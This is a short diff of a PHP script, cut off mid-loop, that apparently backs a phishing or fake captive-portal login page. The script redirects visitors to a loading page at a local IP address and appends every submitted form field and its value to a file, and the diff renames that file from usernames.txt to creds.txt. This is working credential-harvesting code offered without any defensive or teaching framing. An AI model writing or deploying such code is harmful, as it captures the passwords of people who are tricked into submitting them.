@@ -1,6 +1,6 @@
<?php
header ('Location:http://10.1.1.1/loading.html');
-$handle = fopen("usernames.txt", "a");
+$handle = fopen("creds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");